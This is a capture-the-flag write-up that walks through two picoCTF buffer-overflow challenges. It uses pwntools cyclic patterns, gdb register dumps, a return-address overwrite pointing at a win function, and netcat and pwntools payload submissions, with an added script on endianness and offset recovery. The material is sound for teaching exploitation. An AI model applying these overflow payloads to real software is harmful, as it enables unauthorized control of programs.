## buffer overflow 0

1. Create a long string, here I use `cyclic`

   ```shell
   ┌──(kali㉿kali)-[~]
   └─$ python3
   Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
   Type "help", "copyright", "credits" or "license" for more information.
   >>> from pwn import *
   >>> cyclic(96)
   b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa'
   >>>
   ```

2. Test it by running `vuln`

   ```shell
   ┌──(kali㉿kali)-[~/code]
   └─$ ./vuln
   Input: aaaabaaacaaadaaaeaaafaaagaaahaaa
   picoCTF{test}
   ```

   Remember to:
   1. create a file named `flag.txt` and write something in it (here I wrote `picoCTF{test}`)
   2. `chmod +x ./vuln`, or else you won't be able to execute it

3. After making sure it can run, send the command to netcat!

   ```shell
   ┌──(kali㉿kali)-[~/code]
   └─$ nc saturn.picoctf.net 63397
   Input: aaaabaaacaaadaaaeaaafaaagaaahaaaaaaabaaacaaadaaaeaaafaaagaaahaaa
   picoCTF{ov3rfl0ws_ar3nt_that_bad_8446a0c3}
   ```

## buffer overflow 1

### big endian VS little endian

### big

![](https://hackmd.io/_uploads/rkjcTdwi2.png)

### little

![](https://hackmd.io/_uploads/HyVjTODs2.png)

### where each one is used

Storage order of 0x12345678 in **memory** (little endian, as on x86): 0x78 0x56 0x34 0x12

Transmission order of 0x12345678 on the network (big endian): 0x12 0x34 0x56 0x78

ref: https://blog.gtwang.org/programming/difference-between-big-endian-and-little-endian-implementation-in-c/

### Writeup

1. We need to create a long string to cause overflow. Here I use Python `cyclic`

   ```shell
   ┌──(kali㉿kali)-[~]
   └─$ python3
   Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
   Type "help", "copyright", "credits" or "license" for more information.
   >>> from pwn import *
   >>> cyclic(96)
   b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa'
   >>>
   ```

   or you can `import string`, then create a string with `str1 = string.ascii_lowercase` (it is a constant, not a function) and print it.

2. use `gdb` to see how many characters will cause overflow

   ```shell
   ┌──(kali㉿kali)-[~/code]
   └─$ gdb vuln
   GNU gdb (Debian 13.2-1) 13.2
   Copyright (C) 2023 Free Software Foundation, Inc.
   License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
   This is free software: you are free to change and redistribute it.
   There is NO WARRANTY, to the extent permitted by law.
   Type "show copying" and "show warranty" for details.
   This GDB was configured as "x86_64-linux-gnu".
   Type "show configuration" for configuration details.
   For bug reporting instructions, please see:
   <https://www.gnu.org/software/gdb/bugs/>.
   Find the GDB manual and other documentation resources online at:
       <http://www.gnu.org/software/gdb/documentation/>.

   For help, type "help".
   Type "apropos word" to search for commands related to "word"...
   Reading symbols from vuln...
   (No debugging symbols found in vuln)
   gdb-peda$ info function
   All defined functions:

   Non-debugging symbols:
   0x08049000  _init
   0x08049040  printf@plt
   0x08049050  gets@plt
   0x08049060  fgets@plt
   0x08049070  getegid@plt
   0x08049080  puts@plt
   0x08049090  exit@plt
   0x080490a0  __libc_start_main@plt
   0x080490b0  setvbuf@plt
   0x080490c0  fopen@plt
   0x080490d0  setresgid@plt
   0x080490e0  _start
   0x08049120  _dl_relocate_static_pie
   0x08049130  __x86.get_pc_thunk.bx
   0x08049140  deregister_tm_clones
   0x08049180  register_tm_clones
   0x080491c0  __do_global_dtors_aux
   0x080491f0  frame_dummy
   0x080491f6  win
   0x08049281  vuln
   0x080492c4  main
   0x0804933e  get_return_address
   0x08049350  __libc_csu_init
   0x080493c0  __libc_csu_fini
   0x080493c5  __x86.get_pc_thunk.bp
   0x080493cc  _fini
   gdb-peda$ r
   Starting program: /home/kali/code/vuln
   [Thread debugging using libthread_db enabled]
   Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
   Please enter your string: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa
   Okay, time to return... Fingers Crossed... Jumping to 0x6161616c

   Program received signal SIGSEGV, Segmentation fault.
   Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
   Use 'set logging enabled off'.

   Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
   Use 'set logging enabled on'.

   [----------------------------------registers-----------------------------------]
   EAX: 0x41 ('A')
   EBX: 0x6161616a ('jaaa')
   ECX: 0xffffcfac --> 0x49be4100
   EDX: 0x1
   ESI: 0x8049350 (<__libc_csu_init>:	endbr32)
   EDI: 0xf7ffcba0 --> 0x0
   EBP: 0x6161616b ('kaaa')
   ESP: 0xffffd030 ("maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa")
   EIP: 0x6161616c ('laaa')
   EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
   [-------------------------------------code-------------------------------------]
   Invalid $PC address: 0x6161616c
   [------------------------------------stack-------------------------------------]
   0000| 0xffffd030 ("maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa")
   0004| 0xffffd034 ("naaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa")
   0008| 0xffffd038 ("oaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa")
   0012| 0xffffd03c ("paaaqaaaraaasaaataaauaaavaaawaaaxaaa")
   0016| 0xffffd040 ("qaaaraaasaaataaauaaavaaawaaaxaaa")
   0020| 0xffffd044 ("raaasaaataaauaaavaaawaaaxaaa")
   0024| 0xffffd048 ("saaataaauaaavaaawaaaxaaa")
   0028| 0xffffd04c ("taaauaaavaaawaaaxaaa")
   [------------------------------------------------------------------------------]
   Legend: code, data, rodata, value
   Stopped reason: SIGSEGV
   0x6161616c in ?? ()
   ```

   We can see that `EIP` is replaced with `laaa` (the 45th to 48th characters), and the rest (`maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa`) is not used.

3. What we want is to sneak in the location of `win`, which is `0x080491f6`. Therefore, the payload should be `aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08`, which replaces `laaa` with `\xf6\x91\x04\x08` (the address written in little-endian byte order, as it sits in memory).

Then use `echo` to send our payload

```shell=
┌──(kali㉿kali)-[~/code]
└─$ echo "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08" | nc saturn.picoctf.net 64317
Please enter your string:
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoCTF{addr3ss3s_ar3_3asy_a8284f4f}
```

(The prompt above is zsh, whose builtin `echo` interprets `\x` escapes; in bash you need `echo -e` or `printf` for the same result.)

or use pwn to get the flag

```python=
import binascii
from pwn import *

r = remote('saturn.picoctf.net', 59041)
print(r.recvuntil('\n'.encode('latin-1')).decode('latin-1'))   # prompt line
payload = "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08"
print('Sent: 0x' + binascii.hexlify(payload.encode('latin-1')).decode('latin-1'))
r.sendline(payload.encode('latin-1'))   # latin-1 keeps each \x.. as exactly one byte
print(r.recvline().decode('latin-1'))   # Receive line after string is entered
print(r.recv().decode('latin-1'))       # Receive the flag
```

Note that sending the str directly will not work, probably because of a problem with types (bytes or something? not sure)

```shell=
┌──(kali㉿kali)-[~/code]
└─$ nc saturn.picoctf.net 59041
Please enter your string: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08
Okay, time to return... Fingers Crossed... Jumping to 0x3666785c
```
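The following Python is an added example, not part of the writeup, and it uses only the standard library `struct` module rather than pwntools. It reproduces the three things the sessions above show by hand: the endianness section (how `0x12345678` is laid out in memory versus on the network, and why `win` at `0x080491f6` is written as `\xf6\x91\x04\x08`), the gdb step (recovering the 44-byte offset from the crash value `0x6161616c`, which is just the bytes `laaa` read back in little-endian order), and the last `nc` session (the value `0x3666785c` it jumped to is the little-endian reading of the four ASCII characters `\`, `x`, `f`, `6`, and a Python str holding `\xf6\x91\x04\x08` comes out as six bytes under UTF-8 but four under latin-1). The constants are copied from the sessions above; nothing here connects to a server.

```python
import struct

# Values copied from the writeup's sessions above (not captured freshly here).
PATTERN = (b"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaa"
           b"qaaaraaasaaataaauaaavaaawaaaxaaa")   # the 96-byte cyclic(96) output
CRASH_EIP = 0x6161616C   # gdb: "Jumping to 0x6161616c", EIP shown as 'laaa'
NC_EIP = 0x3666785C      # "Jumping to 0x3666785c" when \xf6... was typed literally into nc
WIN_ADDR = 0x080491F6    # gdb: 0x080491f6  win


def to_le(value):
    """Byte order of a 32-bit value in memory on x86 (little endian).

    0x12345678 -> 78 56 34 12
    """
    return struct.pack("<I", value)


def to_be(value):
    """Byte order of the same value on the network (big endian).

    0x12345678 -> 12 34 56 78
    """
    return struct.pack(">I", value)


def eip_as_text(value):
    """The four input characters that produced this EIP value, in input order.

    The return instruction loads EIP from 4 stack bytes in little-endian order,
    so unpacking the register value little-endian gives the bytes back as typed.
    """
    return to_le(value).decode("latin-1")


def find_offset(pattern, crash_value):
    """Position in `pattern` of the 4 bytes that ended up in EIP.

    Raises ValueError when the crash value did not come from this pattern
    (e.g. the register held an address or garbage rather than pattern bytes).
    """
    offset = pattern.find(to_le(crash_value))
    if offset < 0:
        raise ValueError("crash value 0x%08x not found in pattern" % crash_value)
    return offset


def wire_bytes(text, encoding):
    """What a str such as "\\xf6\\x91\\x04\\x08" becomes on the wire under an encoding.

    Code points above 0x7f are 1 byte each in latin-1 but 2 bytes each in UTF-8,
    which is why the address bytes must not go through the UTF-8 default.
    """
    return text.encode(encoding)


if __name__ == "__main__":
    print("0x12345678 in memory :", to_le(0x12345678).hex(" "))
    print("0x12345678 on network:", to_be(0x12345678).hex(" "))
    print("win address in memory:", to_le(WIN_ADDR))
    print("crash EIP came from  :", repr(eip_as_text(CRASH_EIP)),
          "at offset", find_offset(PATTERN, CRASH_EIP))
    print("nc session EIP was   :", repr(eip_as_text(NC_EIP)), "(typed literally)")
    addr = "\xf6\x91\x04\x08"
    print("latin-1:", wire_bytes(addr, "latin-1"), "utf-8:", wire_bytes(addr, "utf-8"))
```

`find_offset` generalises the gdb step: any crash value that came from the pattern is located the same way, whichever 4-byte chunk happened to land in the register. The `wire_bytes` comparison is the concrete difference behind the latin-1 encoding used in the pwntools script.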